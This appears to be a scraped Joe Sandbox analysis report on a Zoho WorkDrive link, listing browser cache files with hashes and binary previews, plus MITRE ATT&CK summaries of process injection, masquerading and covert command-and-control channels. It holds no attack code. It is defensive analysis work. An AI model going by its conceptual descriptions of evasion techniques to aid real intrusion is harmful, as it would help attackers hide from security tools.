Preview:	.PNG........IHDR...v...>.....?"0.....sRGB.......!vIDATx........g/.K..@......%...%Q...5&../P<....."....c..&......D......7.r.5...j.kzfg........zu...u.....E."`...X.,.....E."`...X.,.....E."`...X.,..A.M...z.K..91..Np<w...:..6Nrz..x..n.Y.E"O...'...X...X.,....@S .RI..bv......d@Sd..9+....z...}..X.,....@.!...._.t..h.L.u:5YN......L=...v.........E...$)v1..9..y,....=..".9.z.S.....v....=.d=oA....w...iR.eX.,....@..HR..'.......y.f'.\...}^.<./.sDuM..^.=.....x...yA..,.....E.!.D.H..}'.+.].X...-.m..H.......]..<...WC.......E."`...d.@...%.K\.a.K..rZ..&Z.....g.-.....e..v.a... .I).......N.63...M..M."`....0.I....uZ.^C..G.Z`c.C...TU....m.....h...YZ>xs...X.,...<@ ........N7....e.:v..8....!T7e.Y..9'.lX=c..'v.....X.,.y.@aK.kq..1.\7....T.xg{1o0...l....U....>;}.n.X.;xg.\|..X.,.......F..>...X.te.p.3{z.U?..s./i.....;'.r6."`.h...5...4...'.^......M..s....[.,.....7R....0h.;.oS4.......X.,....o.b_\|....].....n.o]..E.".Z.h.....U.5.J..\|S..#F...3......p..t...X.....

Chrome Cache Entry: 183

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
Category:	downloaded
Size (bytes):	1173
Entropy (8bit):	7.811199816788843
Encrypted:	false
SSDEEP:
MD5:	5C7ACF60A2ACAA5C54BF2B2EC6D484D8
SHA1:	F1837FD5DB6DAD498148D7D77438DE693114B042
SHA-256:	EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
SHA-512:	11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
Preview:	..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[..)..=.....z.?/.._......\|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...\|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.S..wM.,../.\|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.\|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2

Chrome Cache Entry: 184

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 24 x 24
Category:	downloaded
Size (bytes):	2545
Entropy (8bit):	7.142191857408522
Encrypted:	false
SSDEEP:
MD5:	FAA74E8C61FC64D5EDB11613C7EEAD2C
SHA1:	E043879D3EE94A3EDF10260F21F44BFA4A6FC66E
SHA-256:	483C4A0396691993A641EC409C44B8B7E1DAAB0AE7E2B2944C4BC59520BB7655
SHA-512:	451DB4141333FE6561E6259352B6259F80A2B080380D48117B693CC1EA1D6F3CECB5F4A4493AF11C734989E4096B01BAD2B31E47D2E13718628AC254C4DEB70E
Malicious:	false
Reputation:	low
URL:	https://static.zohocdn.com/personal/stable/jsapps/ui-lab/dist/assets/dev/pdfjs/web/images/loading-icon.gif
Preview:	GIF89a...........................................vvv......hhh..........................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..........t...........~."...ds]......)t...-"...i;H>.n.Qg]_......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx.kK.).....?K...............$..."...........K.....W......x..?.G...#.W....n.h.K,.....+.....!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..

Static File Info

⊘No static file info

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Persistence and Installation Behavior

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Chrome Cache Entry: 141

Chrome Cache Entry: 142

Chrome Cache Entry: 143

Chrome Cache Entry: 144

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 153

Chrome Cache Entry: 154

Chrome Cache Entry: 155

Chrome Cache Entry: 156

Chrome Cache Entry: 157

Chrome Cache Entry: 158

Chrome Cache Entry: 159

Chrome Cache Entry: 160

Chrome Cache Entry: 161

Chrome Cache Entry: 162

Chrome Cache Entry: 164

Chrome Cache Entry: 165

Chrome Cache Entry: 166

Chrome Cache Entry: 167

Chrome Cache Entry: 168

Chrome Cache Entry: 169

Chrome Cache Entry: 172

Chrome Cache Entry: 173

Chrome Cache Entry: 174

Chrome Cache Entry: 175

Chrome Cache Entry: 176

Chrome Cache Entry: 177

Chrome Cache Entry: 179

Chrome Cache Entry: 180

Windows Analysis Report
https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5